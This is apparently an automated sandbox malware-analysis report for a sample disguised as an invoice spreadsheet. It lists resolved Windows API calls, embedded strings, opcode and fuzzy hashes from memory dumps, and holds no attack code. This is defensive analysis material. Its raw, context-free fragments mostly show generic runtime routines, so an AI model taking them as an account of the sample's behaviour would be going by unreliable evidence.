                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: InfoItemMenu$Sleep_memset
                                                                              • String ID: 0
                                                                              • API String ID: 1504565804-4108050209
                                                                              • Opcode ID: d1fae1760d081b6b8cddc0049297ea6fd0734e9abca2e90a1ac85592b3d85e38
                                                                              • Instruction ID: 9e8996cb251b45e9fd8013479734a73363ce4640cf951279a7d2fdadd0934edb
                                                                              • Opcode Fuzzy Hash: d1fae1760d081b6b8cddc0049297ea6fd0734e9abca2e90a1ac85592b3d85e38
                                                                              • Instruction Fuzzy Hash: E171E3711043406BD3109F54DD48FABBBE8EBD5306F04086FFD8587252D6B9A94EC76A
                                                                              APIs
                                                                              • DestroyWindow.USER32(?,004A83D8,?), ref: 00455800
                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 00455847
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CreateDestroy
                                                                              • String ID: ,$tooltips_class32
                                                                              • API String ID: 1109047481-3856767331
                                                                              • Opcode ID: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                                              • Instruction ID: af4df8b80438f92fd5356fe82daba85812243c44dff517d7eb602cf52e2cfce3
                                                                              • Opcode Fuzzy Hash: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                                              • Instruction Fuzzy Hash: BF719075244704AFE320DB28CC85F7B77E4EB89700F50491EFA8197391E6B5E905CB59
                                                                              APIs
                                                                              • _wcsncpy.LIBCMT ref: 0045CCFA
                                                                              • __wsplitpath.LIBCMT ref: 0045CD3C
                                                                              • _wcscat.LIBCMT ref: 0045CD51
                                                                              • _wcscat.LIBCMT ref: 0045CD63
                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000104,?), ref: 0045CD78
                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,00000104,?), ref: 0045CD8C
                                                                                • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                              • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDD0
                                                                              • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDE6
                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDF8
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0045CE08
                                                                              • _wcscpy.LIBCMT ref: 0045CE14
                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CE5A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                              • String ID: *.*
                                                                              • API String ID: 1153243558-438819550
                                                                              • Opcode ID: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                                                                              • Instruction ID: 4b7f18f3392d5c51d0b0bcfc25b88d1348604f1c1aa494fd035d881d108a9fe9
                                                                              • Opcode Fuzzy Hash: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                                                                              • Instruction Fuzzy Hash: 0561E5B61043419FD731EF54C885AEBB7E4EB84305F44882FED8983242D67D998E879E
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00455127
                                                                              • GetMenuItemInfoW.USER32 ref: 00455146
                                                                              • DeleteMenu.USER32(?,?,00000000), ref: 004551B2
                                                                              • DeleteMenu.USER32(?,?,00000000), ref: 004551C8
                                                                              • GetMenuItemCount.USER32(?), ref: 004551D9
                                                                              • SetMenu.USER32(?,00000000), ref: 004551E7
                                                                              • DestroyMenu.USER32(?,?,00000000), ref: 004551F4
                                                                              • DrawMenuBar.USER32 ref: 00455207
                                                                              • DeleteObject.GDI32(?), ref: 0045564E
                                                                              • DeleteObject.GDI32(?), ref: 0045565C
                                                                              • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow_memset
                                                                              • String ID: 0
                                                                              • API String ID: 1663942905-4108050209
                                                                              • Opcode ID: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                              • Instruction ID: b4bdd7d0bd4ee66815c45afb4cba49e6688c1fb7c5fb2b704b87d0eb3faa17d4
                                                                              • Opcode Fuzzy Hash: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                              • Instruction Fuzzy Hash: F4413B70600A01AFD715DF24D9A8B6B77A8BF44302F40891DFD49CB292DB78EC44CBA9
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: __get_daylight__invoke_watson$__gmtime64_s$__getptd_noexit
                                                                              • String ID:
                                                                              • API String ID: 1481289235-0
                                                                              • Opcode ID: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                                                              • Instruction ID: 11750150b5911b8a2d77b888e51b7102539fbc40f42687a9f62e69b5342e6946
                                                                              • Opcode Fuzzy Hash: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                                                              • Instruction Fuzzy Hash: 8461B372B00B15DBD724AB69DC81AEB73E99F84324F14452FF011D7682EB78DA808B58
                                                                              APIs
                                                                              • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 0046FB61
                                                                              • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 0046FB7A
                                                                              • SendMessageW.USER32 ref: 0046FBAF
                                                                              • SendMessageW.USER32 ref: 0046FBE2
                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001), ref: 0046FC1B
                                                                              • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0046FC3E
                                                                              • ImageList_Create.COMCTL32(00000020,00000020,00000021,?,00000001), ref: 0046FC51
                                                                              • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 0046FC73
                                                                              • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FC97
                                                                              • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FCA5
                                                                              • SendMessageW.USER32 ref: 0046FD00
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$IconImageList_$CreateExtractReplace
                                                                              • String ID:
                                                                              • API String ID: 2632138820-0
                                                                              • Opcode ID: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                              • Instruction ID: f8b2170a3f6480226351c2682443129a31dd3945ebd2779c8b18a40e734619f9
                                                                              • Opcode Fuzzy Hash: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                              • Instruction Fuzzy Hash: A461BF70208305AFD320DF14DC85F5BB7E4FB89B14F10492EFA85972D1E7B4A8498B66
                                                                              APIs
                                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00433BC7
                                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 00433BDE
                                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 00433BF5
                                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 00433C0C
                                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 00433C23
                                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00433C3A
                                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 00433C51
                                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00433C68
                                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00433C7F
                                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 00433C96
                                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00433CAD
                                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 00433CC4
                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00433CDB
                                                                              • LoadCursorW.USER32(00000000,00000000), ref: 00433CEF
                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00433D06
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CursorLoad
                                                                              • String ID:
                                                                              • API String ID: 3238433803-0
                                                                              • Opcode ID: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                                              • Instruction ID: acd63d7325575073817552101614e6badc0a76bef24473f745c9da0ba21645f6
                                                                              • Opcode Fuzzy Hash: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                                              • Instruction Fuzzy Hash: 6D310E3058C302FFE7504F50EE0AB1C36A0BB48B47F008C7DF64AA62E0E6F055009B9A
                                                                              APIs
                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00460AF5
                                                                              • _wcslen.LIBCMT ref: 00460B00
                                                                              • __swprintf.LIBCMT ref: 00460B9E
                                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00460C11
                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00460C8E
                                                                              • GetDlgCtrlID.USER32(?), ref: 00460CE6
                                                                              • GetWindowRect.USER32(?,?), ref: 00460D21
                                                                              • GetParent.USER32(?), ref: 00460D40
                                                                              • ScreenToClient.USER32(00000000), ref: 00460D47
                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00460DBE
                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 00460DFB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                              • String ID: %s%u
                                                                              • API String ID: 1899580136-679674701
                                                                              APIs
                                                                              • CoTaskMemFree.OLE32(?), ref: 0047D6D3
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              • StringFromCLSID.OLE32(?,?), ref: 0047D6B5
                                                                                • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                              • StringFromIID.OLE32(?,?), ref: 0047D7F0
                                                                              • CoTaskMemFree.OLE32(?), ref: 0047D80A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: FreeFromStringTask_wcslen$_wcscpy
                                                                              • String ID: 0vH$CLSID\$Interface\$ProgID$ToolBoxBitmap32$inprocserver32$localserver32$HH
                                                                              • API String ID: 2485709727-934586222
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: _wcscpy$Folder_memset$BrowseDesktopFromInitializeListMallocPathUninitialize
                                                                              • String ID: HH
                                                                              • API String ID: 3381189665-2761332787
                                                                              APIs
                                                                              • GetDC.USER32(00000000), ref: 00434585
                                                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00434590
                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 0043459B
                                                                              • SelectObject.GDI32(00000000,?), ref: 004345A9
                                                                              • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00434618
                                                                              • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00434665
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                              • String ID: (
                                                                              • API String ID: 3300687185-3887548279
                                                                              APIs
                                                                              • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E463
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E480
                                                                              • __swprintf.LIBCMT ref: 0045E4D9
                                                                              • _printf.LIBCMT ref: 0045E595
                                                                              • _printf.LIBCMT ref: 0045E5B7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: LoadString_printf$__swprintf_wcslen
                                                                              • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR $HH
                                                                              • API String ID: 3590180749-2894483878
                                                                              APIs
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0046F911
                                                                              • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 0046F929
                                                                              • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 0046F942
                                                                              • DeleteObject.GDI32(?), ref: 0046F950
                                                                              • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,00000000,00000000,00000000,00002010,?,000000F0), ref: 0046F95E
                                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9A8
                                                                              • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 0046F9C1
                                                                              • DeleteObject.GDI32(?), ref: 0046F9CF
                                                                              • DestroyIcon.USER32(?,?,000000F7,00000001,00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9DD
                                                                              • ExtractIconExW.SHELL32(?,?,?,000000FF,00000001), ref: 0046FA1D
                                                                              • DestroyIcon.USER32(?), ref: 0046FA4F
                                                                              • SendMessageW.USER32(?,000000F7,00000001,?), ref: 0046FA5A
                                                                              • DeleteObject.GDI32(?), ref: 0046FA68
                                                                              • DestroyIcon.USER32(?,?,000000F7,00000001,?), ref: 0046FA76
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: Icon$Destroy$DeleteMessageObjectSend$ImageLoad$ExtractLongWindow
                                                                              • String ID:
                                                                              • API String ID: 3412594756-0
                                                                              APIs
                                                                                • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                                                                • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                              • GetDriveTypeW.KERNEL32 ref: 0045DA30
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DA76
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DAAB
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DADF
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: SendString$_wcslen$BuffCharDriveLowerType
                                                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                              • API String ID: 4013263488-4113822522
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: _wcslen$_wcsncpy$LocalTime__wcstoi64
                                                                              • String ID:
                                                                              • API String ID: 228034949-0
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?,0046FAD5), ref: 004334F4
                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043350F
                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043351A
                                                                              • GlobalLock.KERNEL32(00000000), ref: 00433523
                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433533
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0043353A
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433541
                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043354F
                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,?), ref: 00433568
                                                                              • GlobalFree.KERNEL32(00000000), ref: 0043357B
                                                                              • GetObjectW.GDI32(?,00000018,?), ref: 004335A6
                                                                              • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004335DB
                                                                              • DeleteObject.GDI32(?), ref: 00433603
                                                                              • SendMessageW.USER32(?,00000172,00000000,?), ref: 0043361B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                              • String ID:
                                                                              • API String ID: 3969911579-0
                                                                              APIs
                                                                              • GetParent.USER32 ref: 00445A8D
                                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00445AA0
                                                                              • __wcsicoll.LIBCMT ref: 00445AC4
                                                                              • __wcsicoll.LIBCMT ref: 00445AE0
                                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445B3D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                              • API String ID: 3125838495-3381328864
                                                                              • Opcode ID: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                              • Instruction ID: 9ea7b4bfd8e333fc3d4c3d1cc69785ca983c3453aa66f955cff8de8c622a02b1
                                                                              • Opcode Fuzzy Hash: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
                                                                              • Instruction Fuzzy Hash: F011E9B1B40301BBFF10B6659C46EAF739CDF94759F00081BFD44E6182F6ACA9458769
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: CopyVariant$ErrorLast
                                                                              • String ID: Conversion of parameters failed$NULL Pointer assignment$Not an Object type
                                                                              • API String ID: 2286883814-4206948668
                                                                              • Opcode ID: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                              • Instruction ID: 5c76bcf0434180a49ef26f8382d3619d889c8a8ee3f63882ad125ac36acecb62
                                                                              • Opcode Fuzzy Hash: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                              • Instruction Fuzzy Hash: 4EA1F0B1644300ABD620EB25CC81EABB3E9FBC4704F10891EF65987251D779E945CBAA
                                                                              APIs
                                                                                • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                                                                • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                              • GetDriveTypeW.KERNEL32(?,?,00000061), ref: 00475EEC
                                                                              • _wcscpy.LIBCMT ref: 00475F18
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                              • String ID: a$all$cdrom$fixed$network$ramdisk$removable$unknown$HH
                                                                              • API String ID: 3052893215-4176887700
                                                                              • Opcode ID: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                                              • Instruction ID: 30c0e749cffa51fc832ec364bb88d57898ea161693411a08ebb212f54f1b1ce2
                                                                              • Opcode Fuzzy Hash: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                                              • Instruction Fuzzy Hash: E951E5716047009BC710EF51D981B9BB3D4AB85705F108C2FF948AB382D7B9DE09879B
                                                                              APIs
                                                                              • StringFromIID.OLE32(?,?,00000003,?,?,00000000), ref: 004582E5
                                                                                • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              • CoTaskMemFree.OLE32(?,00000000), ref: 00458335
                                                                              • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 00458351
                                                                              • RegQueryValueExW.ADVAPI32 ref: 00458381
                                                                              • CLSIDFromString.OLE32(00000000,?), ref: 004583AF
                                                                              • RegQueryValueExW.ADVAPI32 ref: 004583E8
                                                                              • LoadRegTypeLib.OLEAUT32(?,?), ref: 00458486
                                                                                • Part of subcall function 00413F97: __wtof_l.LIBCMT ref: 00413FA1
                                                                              • RegCloseKey.ADVAPI32(?), ref: 004584BA
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: FromQueryStringValue_wcslen$CloseFreeLoadOpenTaskType__wtof_l_wcscpy
                                                                              • String ID: Version$\TypeLib$interface\
                                                                              • API String ID: 656856066-939221531
                                                                              • Opcode ID: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                              • Instruction ID: 73379605cfaaf105ee685c6daddaf2c4824f5dc828714578f474d0d05c7db838
                                                                              • Opcode Fuzzy Hash: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                              • Instruction Fuzzy Hash: 19513B715083059BD310EF55D944A6FB3E8FFC8B08F004A2DF985A7251EA78DD09CB9A
                                                                              APIs
                                                                              • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E676
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E69A
                                                                              • __swprintf.LIBCMT ref: 0045E6EE
                                                                              • _printf.LIBCMT ref: 0045E7A9
                                                                              • _printf.LIBCMT ref: 0045E7D2
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: LoadString_printf$__swprintf_wcslen
                                                                              • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                              • API String ID: 3590180749-2354261254
                                                                              • Opcode ID: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                              • Instruction ID: 835382aeb01427732dc6b750cf2ba574ed77461063debdd42288bdc21f9728b4
                                                                              • Opcode Fuzzy Hash: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                              • Instruction Fuzzy Hash: B051D5715143019BD324FB51CC41EAF77A8AF84354F14093FF94563292DB78AE49CB6A
                                                                              APIs
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                              • String ID: %.15g$0x%p$False$True
                                                                              • API String ID: 3038501623-2263619337
                                                                              • Opcode ID: ab5a81ad92dcb896a2cc0bfeaae3a329f7f66724acbb2efb2cb9fd07ffeff384
